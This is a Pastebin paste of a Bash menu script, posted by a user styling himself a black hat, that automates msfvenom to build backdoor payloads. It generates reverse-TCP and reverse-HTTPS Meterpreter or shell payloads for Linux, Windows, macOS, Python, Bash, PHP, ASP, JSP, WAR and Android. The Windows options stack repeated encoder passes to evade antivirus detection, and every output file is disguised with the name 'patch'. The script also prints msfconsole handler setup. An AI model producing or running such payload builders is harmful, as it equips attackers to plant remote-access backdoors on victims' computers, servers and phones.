DarkProgrammer000

Create Backdoor [expert]

Jul 21st, 2021
1,381
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2.  
  3. ############
  4. # FUNCAO 1 #
  5. ############
  6.  
  7. # Apresentacao
  8. apresentacao()
  9. {
  10.     clear
  11.     printf "     \e[1;92m.-\"\"\"\"-. \e[0m\n"
  12.     printf "    \e[1;92m/        \ \e[0m\n"
  13.     printf " \e[1;77m  \e[0m\e[1;92m/_        _\ \e[0m\n"
  14.     printf "\e[1;77m  \e[0m\e[1;92m// \      / \\ \e[0m\n"
  15.     printf "\e[1;77m  \e[0m\e[1;92m|\__\    /__/ \e[0m\n"
  16.     printf "\e[1;77m  \e[0m\e[1;92m\    ||    / \e[0m\n"
  17.     printf "\e[1;77m   \e[0m\e[1;92m\        / \e[0m\n"
  18.     printf "\e[1;92m \e[0m   \e[1;92m\  __  / \e[0m\n"
  19.     printf "     \e[1;92m'.__.' \e[0m\n\n"
  20.  
  21.     echo -e "\033[01;33m###################################\033[01;37m"
  22.     echo -e "\033[01;32m Desenvolvido por DarProgrammer000\033[01;37m"
  23.     echo -e "\033[31;5m Black Hat DarkProgrammer000\033[0m"
  24.     echo -e "\033[01;33m##################################\033[01;37m"
  25.  
  26.     echo -e "\033[01;31m \n# AVISO !! MsfConsole                    \033[00;37m"
  27.     echo -e "\033[01;32m# -1-> use exploit/multi/handler              \033[00;37m"
  28.     echo -e "\033[01;33m# -2-> set payload ???/meterpreter/reverse_tcp\033[00;37m"
  29.     echo -e "\033[01;34m# -2-> set payload cmd/unix/reverse_???_ssl   \033[00;37m"
  30.     echo ""
  31. }
  32.  
  33. # Mensagem
  34. msg()
  35. {
  36.     # Estrutura de decisao + error_level
  37.     if (($?==0))
  38.     then
  39.         # Mensagem
  40.         echo -e "\033[32;5m\n*** Sucesso ***\033[0m"
  41.         echo -e "\033[32;5m\n<< ENTER >>> \033[0m"
  42.         read
  43.    
  44.     else
  45.         echo -e "\033[31;5m\n*** ERRO ***\033[0m"
  46.         echo -e "\033[31;5m\n<< ENTER >>> \033[0m"
  47.         read
  48.     fi
  49. }
  50.  
  51. ############
  52. # FUNCAO 2 #
  53. ############
  54.  
  55. # Entrada de dados
  56. dados()
  57. {
  58.     # Apresentacao
  59.     while ((1))
  60.     do
  61.         # Apresentacao
  62.         echo ""
  63.         echo -e "\033[01;31m-------------------\033[01;37m"
  64.         echo -e "\033[01;31m# [1] IP interno   \033[01;37m"
  65.         echo -e "\033[01;32m# [2] IP externo   \033[01;37m"
  66.         echo -e "\033[01;31m-------------------\033[01;37m"
  67.         echo -e -n "\033[01;35m\n* Opc.: \033[01;37m"
  68.         read ip
  69.    
  70.         if ((ip==1))
  71.         then
  72.             lhost=$(hostname -I | awk '{print $1}')
  73.             break
  74.  
  75.         elif ((ip==2))
  76.         then
  77.             lhost=$(curl ifconfig.me/ip --silent)
  78.             break
  79.         else
  80.             clear
  81.             continue
  82.         fi
  83.     done
  84.  
  85.  
  86.     # Controle
  87.     echo -e -n "\033[01;32m\n# LHOST: $lhost\033[01;37m"
  88.     echo -e -n "\033[01;32m\n# LPORT: \033[01;37m"
  89.     read lport
  90.  
  91.     echo -e "\033[01;35m\n-.-.-.-.-.-.-.-.-.-.- Loading -.-.-.-.-.-.-.-.-.-.-\033[01;37m"
  92. }
  93.  
  94. # Arquivos executaveis
  95. binaries()
  96. {
  97.  
  98. while ((1))
  99. do
  100.     # Apresentacao
  101.     clear
  102.     echo -e "\033[31;5m---------- BINARIES ----------\033[0m"
  103.     echo -e "\033[01;31m# [1] Linux          \033[01;37m"
  104.     echo -e "\033[01;32m# [2] Windows (encoder)  \033[01;37m"
  105.     echo -e "\033[01;32m# [3] Windows (superEncoder) \033[01;37m"
  106.     echo -e "\033[01;32m# [4] Windows (https)    \033[01;37m"
  107.     echo -e "\033[01;33m# [5] Mac            \033[01;37m"
  108.     echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
  109.     read opc
  110.  
  111.     # Estrutura de decisao: Protecao de menu
  112.     if ((opc > 0 && opc < 6))
  113.     then
  114.         # Chamada de funcao
  115.         dados
  116.        
  117.         case $opc in
  118.         1) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > patch.elf && break;;
  119.        
  120.         2) msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -b "\x00" -e x86/shikata_ga_nai -f exe > patch.exe && break;;
  121.        
  122.         3) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw -e x86/shikata_ga_nai -i 9 | \
  123.            msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | \
  124.            msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -f exe > patch.exe && break;;
  125.  
  126.         4) msfvenom -p windows/meterpreter/reverse_https LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -i 20 -f exe > patch.exe && break;;
  127.  
  128.         5) msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > patch.macho && break;;
  129.        
  130.         esac
  131.  
  132.     else
  133.         continue
  134.     fi
  135. done
  136.  
  137. # Chamada de funcao
  138. msg
  139.  
  140. }
  141.  
  142. # Arquivos em script
  143. script()
  144. {
  145.     while ((1))
  146.     do
  147.         # Apresentacao
  148.         clear
  149.         echo -e "\033[31;5m---------- LINUX ----------\033[0m"
  150.         echo -e "\033[01;31m# [1] Python          \033[01;37m"
  151.         echo -e "\033[01;32m# [2] Bash            \033[01;37m"
  152.         echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
  153.         read opc
  154.        
  155.         # Estrutura de decisao: Protecao de menu
  156.         if ((opc > 0 && opc < 3))
  157.         then
  158.             # Chamada de funcao
  159.             dados
  160.            
  161.             case $opc in
  162.                
  163.             1) msfvenom -p python/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.py && break;;
  164.             #1) msfvenom -p cmd/unix/reverse_python LHOST=$lhost LPORT=$lport -f raw > patch.py && break;;
  165.             #1) msfvenom -p cmd/unix/reverse_python_ssl LHOST=$lhost LPORT=$lport -f raw > patch.py;;
  166.  
  167.             2) msfvenom -p cmd/unix/reverse_bash LHOST=$lhost LPORT=$lport -f raw > patch.sh && break;;
  168.  
  169.             *) continue;;
  170.  
  171.             esac
  172.        
  173.         else
  174.             continue
  175.         fi
  176.     done
  177.  
  178.     # Chamada de funcao
  179.     msg
  180. }
  181.  
  182. # Arquivos de servidores
  183. web()
  184. {
  185.     while ((1))
  186.     do
  187.         # Apresentacao
  188.         clear
  189.         echo -e "\033[31;5m---------- WEB ---------\033[0m"
  190.         echo -e "\033[01;31m# [1] PHP          \033[01;37m"
  191.         echo -e "\033[01;32m# [2] ASP          \033[01;37m"
  192.         echo -e "\033[01;33m# [3] JSP          \033[01;37m"
  193.         echo -e "\033[01;34m# [4] WAR          \033[01;37m"
  194.         echo -e -n "\033[01;35m\n- Opc.: \033[01;37m"
  195.         read opc
  196.    
  197.         # Estrutura de decisao: Protecao de menu
  198.         if ((opc > 0 && opc < 5))
  199.         then
  200.             # Chamada de funcao
  201.             dados
  202.    
  203.             case $opc in
  204.  
  205.             1) msfvenom -p php/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.php && break;;
  206.        
  207.             2) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f asp > patch.asp && break;;
  208.    
  209.             3) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.jsp && break;;
  210.            
  211.             4) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war > patch.war && break;;
  212.            
  213.             *) continue;;
  214.  
  215.             esac
  216.         else
  217.             continue
  218.         fi
  219.     done
  220.  
  221.     # Chamada de funcao
  222.     msg
  223. }
  224.  
  225. # Arquivos em script
  226. apk()
  227. {
  228.     # Apresentacao
  229.     clear
  230.     echo -e "\033[31;5m---------- ANDROID ----------\033[0m"
  231.  
  232.     # Chamada de funcao
  233.     dados
  234.  
  235.     # Comando
  236.     msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport > patch.apk
  237.  
  238.     # Chamada de funcao
  239.     msg
  240. }
  241.  
  242. # Programa
  243. programa()
  244. {
  245.     # Apresentacao
  246.     while ((1))
  247.     do
  248.         apresentacao
  249.         echo -e "\033[01;37m---------- BACKDOOR (MSF VENOM) ----------\033[01;37m"
  250.         echo -e "\033[01;31m# [1] BINARIES                \033[01;37m"
  251.         echo -e "\033[01;32m# [2] SCRIPT                  \033[01;37m"
  252.         echo -e "\033[01;33m# [3] WEB                     \033[01;37m"
  253.         echo -e "\033[01;34m# [4] APK                     \033[01;37m"
  254.         echo -e "\033[01;35m# [0] Sair                              \n\033[01;37m"
  255.         echo -e -n "\033[01;36m- Opc.: \033[01;37m"
  256.         read opc
  257.        
  258.         case $opc in
  259.  
  260.         1) binaries;;
  261.    
  262.         2) script;;
  263.  
  264.         3) web;;
  265.        
  266.         4) apk;;
  267.  
  268.         0) break;;
  269.  
  270.         *) continue;;
  271.  
  272.         esac
  273.     done
  274. }
  275.  
  276. # Execucao do programa
  277. programa
  278.  
  279. # -> Descomente as linhas abaixo caso queria iniciar automaticamente:
  280. # Iniciar servidor postgresql
  281. # /etc/init.d/postgresql restart
  282.  
  283. # Abrir outro terminal execuntado MSFCONSOLE
  284. # gnome-terminal -- msfconsole
RAW Paste Data